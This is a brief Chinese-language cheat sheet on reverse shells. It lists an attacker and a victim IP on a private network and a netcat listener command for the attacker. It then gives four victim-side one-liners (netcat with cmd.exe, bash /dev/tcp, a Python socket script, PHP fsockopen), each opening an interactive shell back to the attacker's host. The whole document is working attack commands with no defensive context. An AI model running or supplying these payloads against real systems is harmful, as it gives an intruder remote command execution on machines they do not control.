攻击端IP（黑客）：192.168.0.110
靶机IP（受害者）192.168.0.107

NC反弹shell的方式:
攻击端执行：nc -lvp 8080

靶机执行：
1、nc 192.168.0.110 8080 -e c:\windows\system32\cmd.exe
2、bash -i >& /dev/tcp/192.168.0.110/8080 0>&1
3、python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.110',8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
4、php -r '$sock=fsockopen("192.168.0.110",8080);exec("/bin/sh -i <&3 >&3 2>&3");'